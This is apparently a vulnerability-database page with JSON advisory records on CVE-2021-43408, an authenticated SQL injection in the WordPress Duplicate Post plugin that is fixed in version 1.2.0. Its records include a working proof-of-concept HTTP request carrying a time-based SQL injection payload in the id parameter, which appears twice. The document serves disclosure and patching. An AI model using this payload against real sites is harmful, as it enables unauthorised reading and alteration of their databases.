DATABASE RESOURCES PRICING ABOUT US

{"id": "WPEX-ID:D2B0A86B-3964-47ED-89B3-7350B4395B4B", "vendorId": null, "type": "wpexploit", "bulletinFamily": "exploit", "title": "Duplicate Post < 1.2.0 - Authenticated SQL Injection", "description": "The plugin does not properly sanitise and escape the id parameter passed to the cdp_action_handling AJAX action, which could allow user having access to the plugin (by default admins) to perform SQL Injection attacks\n", "published": "2021-10-25T00:00:00", "modified": "2021-11-21T09:13:49", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "", "reporter": "wpvulndb", "references": ["https://appcheck-ng.com/security-advisory-duplicate-post-wordpress-plugin-sql-injection-vulnerability/"], "cvelist": ["CVE-2021-43408"], "immutableFields": [], "lastseen": "2021-11-26T19:32:11", "viewCount": 39, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0919"]}, {"type": "cve", "idList": ["CVE-2021-43408"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:D2B0A86B-3964-47ED-89B3-7350B4395B4B"]}], "rev": 4}, "score": {"value": 5.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0919"]}, {"type": "cve", "idList": ["CVE-2021-43408"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:D2B0A86B-3964-47ED-89B3-7350B4395B4B"]}]}, "exploitation": null, "vulnersScore": 5.3}, "sourceData": "POST /wp-admin/admin-ajax.php HTTP/1.1\r\nContent-Length: 229\r\nAccept: */*\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: wordpress_3d2361ff3a8f0d..(truncated)\r\nConnection: close\r\n\r\naction=cdp_action_handling&token=cdp&f=copy_post&origin=tooltip&id%5B%5D=1%20and%20(select*from(select(sleep(9)))a)--%20&data%5Btype%5D=copy-quick&data%5Btimes%5D=1&data%5Bsite%5D=-1&data%5Bprofile%5D=default&data%5Bswap%5D=false\r\n", "generation": 0, "_state": {"dependencies": 1646312654}}

{"patchstack": [{"lastseen": "2022-06-01T19:29:06", "description": "Authenticated SQL Injection (SQLi) vulnerability discovered by AppCheck in WordPress Duplicate Post plugin (versions <= 1.1.9).\n\n## Solution\n\n\r\n Update the WordPress Duplicate Post plugin to the latest available version (at least 1.2.0).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "patchstack", "title": "WordPress Duplicate Post plugin <= 1.1.9 - Authenticated SQL Injection (SQLi) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43408"], "modified": "2021-10-25T00:00:00", "id": "PATCHSTACK:7172D8C7B449016928B827FE834E4428", "href": "https://patchstack.com/database/vulnerability/copy-delete-posts/wordpress-duplicate-post-plugin-1-1-9-authenticated-sql-injection-sqli-vulnerability", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "wpvulndb": [{"lastseen": "2021-11-26T19:32:11", "description": "The plugin does not properly sanitise and escape the id parameter passed to the cdp_action_handling AJAX action, which could allow user having access to the plugin (by default admins) to perform SQL Injection attacks\n\n### PoC\n\nPOST /wp-admin/admin-ajax.php HTTP/1.1 Content-Length: 229 Accept: */* X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_3d2361ff3a8f0d..(truncated) Connection: close action=cdp_action_handling&amp;token;=cdp&amp;f;=copy_post&amp;origin;=tooltip&amp;id;%5B%5D=1%20and%20(select*from(select(sleep(9)))a)--%20&amp;data;%5Btype%5D=copy-quick&amp;data;%5Btimes%5D=1&amp;data;%5Bsite%5D=-1&amp;data;%5Bprofile%5D=default&amp;data;%5Bswap%5D=false \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "wpvulndb", "title": "Duplicate Post < 1.2.0 - Authenticated SQL Injection", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43408"], "modified": "2021-11-21T09:13:49", "id": "WPVDB-ID:D2B0A86B-3964-47ED-89B3-7350B4395B4B", "href": "https://wpscan.com/vulnerability/d2b0a86b-3964-47ed-89b3-7350b4395b4b", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:30:26", "description": "An SQL injection vulnerability exists in WordPress Duplicate Post Plugin. Successful exploitation of this vulnerability would allow a remote attacker to execute arbitrary SQL commands on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-15T00:00:00", "type": "checkpoint_advisories", "title": "WordPress Duplicate Post Plugin SQL Injection (CVE-2021-43408)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43408"], "modified": "2021-12-15T00:00:00", "id": "CPAI-2021-0919", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T19:41:07", "description": "The \"Duplicate Post\" WordPress plugin up to and including version 1.1.9 is vulnerable to SQL Injection. SQL injection vulnerabilities occur when client supplied data is included within an SQL Query insecurely. SQL Injection can typically be exploited to read, modify and delete SQL table data. In many cases it also possible to exploit features of SQL server to execute system commands and/or access the local file system. This particular vulnerability can be exploited by any authenticated user who has been granted access to use the Duplicate Post plugin. By default, this is limited to Administrators, however the plugin presents the option to permit access to the Editor, Author, Contributor and Subscriber roles.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-19T16:15:00", "type": "cve", "title": "CVE-2021-43408", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43408"], "modified": "2021-11-24T16:53:00", "cpe": ["cpe:/a:duplicate_post_project:duplicate_post:1.1.9"], "id": "CVE-2021-43408", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43408", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:duplicate_post_project:duplicate_post:1.1.9:*:*:*:*:wordpress:*:*"]}], "githubexploit": [{"lastseen": "2022-05-31T04:57:14", "description": "# CVE-2021-43408: Wordpress Plugin Duplicate Post version 1.1.9 ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-31T03:00:27", "type": "githubexploit", "title": "Exploit for SQL Injection in Duplicate Post Project Duplicate Post", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43408"], "modified": "2022-05-31T03:17:53", "id": "937004C6-1E3E-5F32-9979-879BB411E877", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}]}